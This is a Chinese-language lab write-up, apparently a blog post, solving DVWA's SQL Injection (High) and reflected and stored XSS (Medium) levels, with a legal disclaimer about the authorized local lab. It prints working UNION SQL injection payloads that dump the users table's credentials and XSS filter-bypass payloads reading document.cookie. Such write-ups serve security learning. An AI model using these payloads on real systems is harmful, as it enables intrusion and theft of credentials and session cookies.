DVWA(SQL Injection-High,XSS Reflected-Medium,XSS Stored-Medium)

SQL Injection-High

1.这就是一道很经典的SQL注入的题目,我们根据这种题目的全流程来做一遍。首先是要确定这个注入点在哪里,确定注入成功,可以开始操作。

2.然后我们要去确定这个数据库的列数,当我们输入1' order by 3#的时候就会报错,所以确定这个列数为2

3.下一步是判断数据的位置以及确定数据库的类型以及相关信息,

4.然后就是确定这个数据库里面的数据表的名字

sql 复制代码
0' union select convert(group_concat(table_name) using utf8) collate utf8_general_ci,2 from information_schema.tables where table_schema=database()#

5.下一步就是得到这个数据表里的users的信息

sql 复制代码
0' union select convert(group_concat(column_name) using utf8) collate utf8_general_ci,2 from information_schema.columns where table_schema='dvwa'#

6.然后我们通过上面得到的确定的两列user和password来获取这两列的信息,解决问题

sql 复制代码
0' union select convert(group_concat(user,0x3a,password) using utf8) collate utf8_general_ci,2 from dvwa.users#

XSS Reflected-Medium

1.这个XSS反射题目我们按照之前的写法直接输入:得到的反馈是直接输出中间那一部分,没有拿到目的的cookie值,所以我们可以换一种写法:

javascript 复制代码
<script>alert(document.cookie)</script>

利用它只匹配小写 <script> 的漏洞,写成大写:

javascript 复制代码
<ScRiPt>alert(document.cookie)</sCrIpT>

或者是嵌套拆字(把删掉的部分补回来):

javascript 复制代码
<scr<script>ipt>alert(1)</scr</script>ipt>

换标签(根本不用 script 标签):

javascript 复制代码
<img src=x onerror=alert(document.cookie)>

这样都可以直接得到目的的cookie

XSS Stored-Medium

1.这个题目和之前的题目不一样,这个Name框里面会限制输入的字符大小,但是这个我们是可以在BP里面解决的,先可以随便在两个框内输入信息,然后用BP拦截这一次的访问,然后再进行修改即可,然后成功后记得清空留言板。

声明:

本文所有实验均在本人本地电脑搭建的 DVWA(Damn Vulnerable Web Application)授权靶场环境中完成。DVWA 是专为网络安全学习设计的开源漏洞演练平台,实验环境为本地 phpStudy + MySQL,未连接任何公网服务。文中涉及的注入与 XSS 技术仅用于个人学习网络安全知识与记录实验过程。

SQL 注入与 XSS 攻击均属于违法行为,《中华人民共和国刑法》第 285、286 条对非法侵入计算机信息系统、破坏计算机信息系统罪有明确规定,《网络安全法》对危害网络信息安全的行为亦有相应罚则。未经授权对他人网站、服务器或系统进行渗透测试,无论是否造成损害,都可能构成犯罪。

文中所有 payload 在合法授权环境之外不具备直接使用价值,且现代框架已普遍内置输出编码、参数化查询等防御措施。请读者仅在学习环境中复现,技术是用来防守的。

如有错误欢迎指正,转载请注明出处。

相关推荐
@Mike@37 分钟前
12-数据库学习笔记(五种连接算法)
数据库·笔记·学习
Omics Pro1 小时前
之江实验室NAR|虚拟细胞3阶段训练范式
数据库·人工智能·算法·机器学习·自然语言处理
龙亘川1 小时前
探索智慧文化服务:建设初衷、整体架构、技术支撑、发展现状与实践影响
大数据·数据库·架构
风早爽太1 小时前
Python 学习笔记:数据库迁移工具 ‌Alembic
数据库·python·fastapi·alembic
2501_933670791 小时前
2027风控策略岗秋招准备:SQL、Excel、建模的优先级与项目路径
人工智能·sql·excel
java1234_小锋1 小时前
【技术专题】Mysql8 数据库 - Mysql8 数据库基本操作
数据库·mysql
其实防守也摸鱼2 小时前
DeepSeek Harness 开源贡献手记:从 Issue 到 Merge 的完整旅程
android·数据库·学习·ai·oracle·自动化
一隅论数智2 小时前
给AI找对“富矿“:本体协同的六大应用模式与落地战法
大数据·人工智能·经验分享·笔记·学习·学习方法·政务
jason.zeng@15022072 小时前
canal做mysql的异步传输工具
数据库·mysql·linq